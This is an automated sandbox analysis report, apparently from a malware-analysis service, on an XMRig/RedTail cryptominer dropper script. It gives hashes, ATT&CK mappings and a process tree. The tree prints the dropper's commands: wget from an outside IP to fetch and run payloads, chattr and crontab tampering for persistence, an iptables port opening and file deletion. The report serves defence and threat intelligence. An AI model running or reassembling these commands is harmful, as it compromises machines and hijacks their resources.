xmrig | 3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01-02-2025 03:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
Size

1KB
MD5

a85657b9ccd1984a6757a87845a61a0d
SHA1

1dc82b5d65d775348c4addefa3e2ff470d19bc3e
SHA256

3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd
SHA512

1b79940f7fc522e6797060023cf713d16e44ff15bf98b41ecb0baf9da3cadb17eaf168abc4cbd3e0dd6d0eecd3b936651f1f8d9b4f19c78bda26b8d94dd31aab

Score

10^/10

xmrig antivm defense_evasion discovery execution miner persistence privilege_escalation upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (112720) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/memory/836-1-0xb6b71000-0xb6ed6454-memory.dmp	xmrig

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
782	chmod
835	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/.redtail	836	3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh

Attempts to change immutable files 24 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
788	grep
795	chattr
796	grep
802	grep
810	chattr
786	chattr
792	chattr
798	chattr
799	grep
801	chattr
811	chattr
812	chattr
814	grep
787	chattr
853	iptables
852	sh
804	chattr
805	grep
807	chattr
790	chattr
793	grep
808	grep
813	chattr
791	chattr

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.l1o1IM	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads network interface configuration 2 TTPs 6 IoCs

Fetches information about one or more active network interfaces.

discovery

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/sys/devices/virtual/net/lo/queues/rx-0	find
File opened for reading	/sys/devices/virtual/net/lo/statistics	find
File opened for reading	/sys/devices/virtual/net/lo/power	find
File opened for reading	/sys/devices/virtual/net/lo/queues	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits	find

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-18.dat	upx

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	systemd	839	.redtail

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	.redtail

Reads CPU attributes 1 TTPs 27 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/topology	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpufreq	find
File opened for reading	/sys/devices/system/cpu/cpu0	find
File opened for reading	/sys/devices/system/cpu/cpu0/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/power	find
File opened for reading	/sys/devices/system/cpu/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpu0/hotplug	find
File opened for reading	/sys/devices/system/cpu/online	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.redtail

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_ext_map_blocks_exit	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_swapoff	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_munmap	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_getpriority	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setgid	find
File opened for reading	/sys/devices/platform/gpio-keys/input/input0/event0/power	find
File opened for reading	/sys/bus/clockevents	find
File opened for reading	/sys/bus/platform/drivers/samsung-uart	find
File opened for reading	/sys/bus/platform/drivers/imx6q-pinctrl	find
File opened for reading	/sys/module/block/parameters	find
File opened for reading	/sys/kernel/debug/tracing/events/huge_memory/mm_collapse_huge_page_swapin	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_io_destroy	find
File opened for reading	/sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup-dev.service	find
File opened for reading	/sys/devices/cpu_atom/cpus	.redtail
File opened for reading	/sys/fs/cgroup/devices/system.slice/networking.service	find
File opened for reading	/sys/kernel/debug/tracing/events/spi	find
File opened for reading	/sys/kernel/debug/tracing/events/clk/clk_set_phase	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setfsuid16	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_geteuid16	find
File opened for reading	/sys/devices/platform/a003c00.virtio_mmio/virtio0/block/vda/trace	find
File opened for reading	/sys/devices/virtual/vc/vcsa3/power	find
File opened for reading	/sys/fs/cgroup/pids/system.slice/system-getty.slice	find
File opened for reading	/sys/bus/platform/drivers/ti-adpll	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_fgetxattr	find
File opened for reading	/sys/devices/platform/a003c00.virtio_mmio/virtio0/block/vda/vda2/holders	find
File opened for reading	/sys/firmware/devicetree/base/cpus/cpu-map/socket0	find
File opened for reading	/sys/kernel/debug/tracing/events/jbd2/jbd2_commit_flushing	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_pciconfig_write	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_shmat	find
File opened for reading	/sys/devices/platform/4010000000.pcie/power	find
File opened for reading	/sys/devices/virtual/mem/full	find
File opened for reading	/sys/devices/virtual/tty/tty40	find
File opened for reading	/sys/devices/virtual/vc/vcsa2	find
File opened for reading	/sys/bus/platform/drivers/imx51-pinctrl	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_es_remove_extent	find
File opened for reading	/sys/kernel/debug/tracing/events/ftrace/print	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_name_to_handle_at	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_getdents64	find
File opened for reading	/sys/fs/cgroup/pids/system.slice/ssh.service	find
File opened for reading	/sys/fs/cgroup/pids/system.slice/systemd-timedated.service	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_writepages_result	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_msgsnd	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_setresuid	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_exit_group	find
File opened for reading	/sys/devices/virtual/tty/console/power	find
File opened for reading	/sys/module/mousedev	find
File opened for reading	/sys/kernel/debug/tracing/events/kmem/mm_page_free_batched	find
File opened for reading	/sys/kernel/debug/tracing/events/cgroup/cgroup_release	find
File opened for reading	/sys/devices/virtual/tty/tty32	find
File opened for reading	/sys/firmware/devicetree/base/timer	find
File opened for reading	/sys/fs/cgroup/devices/user.slice/user-0.slice	find
File opened for reading	/sys/bus/platform/drivers/syscon-poweroff	find
File opened for reading	/sys/kernel/irq/19	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_ustat	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_symlink	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_setreuid	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_waitid	find
File opened for reading	/sys/devices/virtual/tty/tty/power	find
File opened for reading	/sys/fs/cgroup/systemd/system.slice/dev-hugepages.mount	find
File opened for reading	/sys/kernel/debug/tracing/events/skb/kfree_skb	find
File opened for reading	/sys/kernel/debug/tracing/events/filemap/mm_filemap_delete_from_page_cache	find
File opened for reading	/sys/bus/clocksource/devices	find
File opened for reading	/sys/kernel/debug/tracing/events/ftrace/context_switch	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_mq_notify	find

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/282/task/282/net/dev_snmp6	find
File opened for reading	/proc/389	find
File opened for reading	/proc/649/task/649/net	find
File opened for reading	/proc/sys/net/ipv4/neigh/default	find
File opened for reading	/proc/18/task/18/net/netfilter	find
File opened for reading	/proc/25/fd	find
File opened for reading	/proc/42/task/42/fdinfo	find
File opened for reading	/proc/42/fdinfo	find
File opened for reading	/proc/sys/vm	find
File opened for reading	/proc/2/task/2/net/stat	find
File opened for reading	/proc/131/attr	find
File opened for reading	/proc/299/task/299/fdinfo	find
File opened for reading	/proc/441/task/441	find
File opened for reading	/proc/43/task	find
File opened for reading	/proc/148/task	find
File opened for reading	/proc/297/task/297/net	find
File opened for reading	/proc/bus	find
File opened for reading	/proc/3/task/3/net/stat	find
File opened for reading	/proc/21/fdinfo	find
File opened for reading	/proc/42/task/42/net	find
File opened for reading	/proc/42/task/42/net/dev_snmp6	find
File opened for reading	/proc/403/task/403/fd	find
File opened for reading	/proc/25/cmdline	.redtail
File opened for reading	/proc/646/fd	find
File opened for reading	/proc/651/task/651/net/stat	find
File opened for reading	/proc/fs/nfsd	find
File opened for reading	/proc/irq/53/rtc-pl031	find
File opened for reading	/proc/2/ns	find
File opened for reading	/proc/41/task/41	find
File opened for reading	/proc/270/task/270/net/stat	find
File opened for reading	/proc/15/task/15/fd	find
File opened for reading	/proc/41	find
File opened for reading	/proc/267/attr	find
File opened for reading	/proc/441/task/441/net/stat	find
File opened for reading	/proc/283/net/netfilter	find
File opened for reading	/proc/16/attr	find
File opened for reading	/proc/18/net	find
File opened for reading	/proc/25/task/25/fdinfo	find
File opened for reading	/proc/108/task/108/net	find
File opened for reading	/proc/165/net/stat	find
File opened for reading	/proc/7/fdinfo	find
File opened for reading	/proc/403/task/403/net	find
File opened for reading	/proc/649/fd	find
File opened for reading	/proc/661/task/661/net/netfilter	find
File opened for reading	/proc/904/cmdline	.redtail
File opened for reading	/proc/29/task/29/ns	find
File opened for reading	/proc/107/task	find
File opened for reading	/proc/269/net/netfilter	find
File opened for reading	/proc/3	find
File opened for reading	/proc/3/task/3/ns	find
File opened for reading	/proc/3/net/netfilter	find
File opened for reading	/proc/23/task	find
File opened for reading	/proc/28/net	find
File opened for reading	/proc/270/task/270/fd	find
File opened for reading	/proc/311/task/311/net/netfilter	find
File opened for reading	/proc/648/task/648/fdinfo	find
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/cmdline	.redtail
File opened for reading	/proc/439/fd	find
File opened for reading	/proc/664/net/stat	find
File opened for reading	/proc/sys/net/ipv4/conf/eth0	find
File opened for reading	/proc/75/fd	find
File opened for reading	/proc/97/map_files	find
File opened for reading	/proc/137/task/137/attr	find

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/clean_crontab	sh

/tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
/tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
1⤵
- Executes dropped EXE
PID:649
- /bin/grep
  grep noexec
  2⤵
  PID:657
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:658
- /bin/cat
  cat /proc/mounts
  2⤵
  PID:656
- /usr/bin/whoami
  whoami
  2⤵
  PID:666
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*"
  2⤵
  - Reads network interface configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:669
- /bin/uname
  uname -mp
  2⤵
  PID:776
- /usr/bin/touch
  touch .testfile
  2⤵
  PID:777
- /bin/dd
  dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
  2⤵
  PID:779
- /bin/rm
  rm -rf .testfile .testfile2
  2⤵
  PID:780
- /usr/bin/wget
  wget http://195.177.95.149/clean
  2⤵
  PID:781
- /bin/chmod
  chmod +x clean
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /bin/sh
  sh clean
  2⤵
  - Writes file to tmp directory
  PID:783
- - /bin/systemctl
    systemctl disable c3pool_miner
    3⤵
    PID:784
- - /bin/systemctl
    systemctl stop c3pool_miner
    3⤵
    - Reads runtime system information
    PID:785
- - /usr/bin/chattr
    chattr -ia /var/spool/cron/crontabs
    3⤵
    - Attempts to change immutable files
    PID:786
- - /usr/bin/chattr
    chattr -ia /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:787
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:788
- - /bin/mv
    mv /tmp/clean_crontab /etc/crontab
    3⤵
    PID:789
- - /usr/bin/chattr
    chattr -ia /etc/cron.hourly
    3⤵
    - Attempts to change immutable files
    PID:790
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily
    3⤵
    - Attempts to change immutable files
    PID:791
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:792
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:793
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/apt-compat
    3⤵
    PID:794
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:795
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:796
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
    3⤵
    PID:797
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:798
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:799
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/dpkg
    3⤵
    PID:800
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:801
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:802
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/exim4-base
    3⤵
    PID:803
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:804
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:805
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/logrotate
    3⤵
    PID:806
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:807
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:808
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/passwd
    3⤵
    PID:809
- - /usr/bin/chattr
    chattr -ia /etc/cron.weekly
    3⤵
    - Attempts to change immutable files
    PID:810
- - /usr/bin/chattr
    chattr -ia /etc/cron.monthly
    3⤵
    - Attempts to change immutable files
    PID:811
- - /usr/bin/chattr
    chattr -ia /etc/cron.d
    3⤵
    - Attempts to change immutable files
    PID:812
- - /usr/bin/chattr
    chattr -ia /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:813
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:814
- - /bin/mv
    mv /tmp/clean_crontab /etc/anacrontab
    3⤵
    PID:815
- - /bin/rm
    rm -rf /tmp/3a9ae9bd26448244f01988d954e60d3492da84ae1b6237965cf35b9ebf3912cd.sh
    3⤵
    PID:816
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:817
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:818
- /bin/rm
  rm -rf clean
  2⤵
  PID:819
- /bin/rm
  rm -rf .redtail
  2⤵
  PID:820
- /bin/grep
  grep -q x86_64
  2⤵
  PID:822
- /bin/grep
  grep -q amd64
  2⤵
  PID:824
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:826
- /bin/grep
  grep -q armv8
  2⤵
  PID:828
- /bin/grep
  grep -q aarch64
  2⤵
  PID:830
- /bin/grep
  grep -q armv7
  2⤵
  PID:832
- /usr/bin/wget
  wget http://195.177.95.149/arm7
  2⤵
  PID:833
- /bin/mv
  mv arm7 .redtail
  2⤵
  PID:834
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /.redtail
  ./.redtail
  2⤵
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:836
- - /bin/sh
    sh -c "command -v crontab >/dev/null 2>&1"
    3⤵
    PID:840
- - /bin/sh
    sh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"
    3⤵
    PID:841
  - - /usr/bin/crontab
      crontab -r
      4⤵
      PID:842
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:844
- - /bin/sh
    sh -c "command -v php >/dev/null 2>&1"
    3⤵
    PID:845
- - /bin/sh
    sh -c "command -v nginx >/dev/null 2>&1"
    3⤵
    PID:846
- - /bin/sh
    sh -c "which apache2"
    3⤵
    PID:847
  - - /usr/bin/which
      which apache2
      4⤵
      PID:848
- - /bin/sh
    sh -c "which httpd"
    3⤵
    PID:849
  - - /usr/bin/which
      which httpd
      4⤵
      PID:850
- - /bin/sh
    sh -c "iptables -I INPUT -p tcp --dport 40235 -j ACCEPT >/dev/null 2>&1"
    3⤵
    - Attempts to change immutable files
    PID:852
  - - /sbin/iptables
      iptables -I INPUT -p tcp --dport 40235 -j ACCEPT
      4⤵
      Attempts to change immutable files
      PID:853

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.testfile2

Filesize
2.0MB

MD5
b2d1236c286a3c0704224fe4105eca49

SHA1
7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

SHA256
5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

SHA512
731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

Download Submit
/arm7

Filesize
1.1MB

MD5
045daa66263bfd467051c013e9222faf

SHA1
4b943b14526d7bf7be2b3e3f9af24d1f35015548

SHA256
d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

SHA512
bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

Download Submit
/clean

Filesize
795B

MD5
397ff5e54194072e6d8a44a0d8cc1b27

SHA1
42477b0c3b277b5e907b0a35c644f3291ed30a63

SHA256
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

SHA512
ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
30e858769aacd9cc309502f8d5c6aa0f

SHA1
927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

SHA256
eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

SHA512
f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

Download Submit
/tmp/clean_crontab

Filesize
3KB

MD5
02f33c9e59b27bcd241e488cd48de072

SHA1
9247eee9b2310d56455beccf41c577ba16b78e3d

SHA256
2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

SHA512
1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

Download Submit
/tmp/clean_crontab

Filesize
249B

MD5
db990990933b6f56322725223f13c2bc

SHA1
387303696a796e27f559c73679e979f2a538072d

SHA256
777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

SHA512
a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

Download Submit
/tmp/clean_crontab

Filesize
722B

MD5
8f111d100ea459f68d333d63a8ef2205

SHA1
077ca9c46a964de67c0f7765745d5c6f9e2065c3

SHA256
0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

SHA512
d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
bc4a71cbcaeed4179f25d798257fa980

SHA1
61445721d0b5d86ac0a8386a4ceef450118f4fbb

SHA256
8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

SHA512
709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

Download Submit
/tmp/clean_crontab

Filesize
279B

MD5
911a774fe040993b929504f3d9415ab3

SHA1
55ccc8e95097f005abf9f4d91a14394e6d0f5da5

SHA256
340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

SHA512
1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

Download Submit
/var/spool/cron/crontabs/tmp.l1o1IM

Filesize
193B

MD5
9c416d9f462a6fa35ce3b96d2fee5e84

SHA1
db51c40363e3505a9c3f938cdd3b5e7eb407bb2b

SHA256
2efb80a877e3ab7b23c6660cee21218197cfbdb968a2954fe7a79dd053c99b1f

SHA512
929f7df399ea0dce0a67ef1fd12c1a998efcd0d4e3555e672e0d2cb3c98ef48263ded979ff645dbfe3e53fe6cc29ca0b889e5de81913f20bb92da1af75efaf91

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads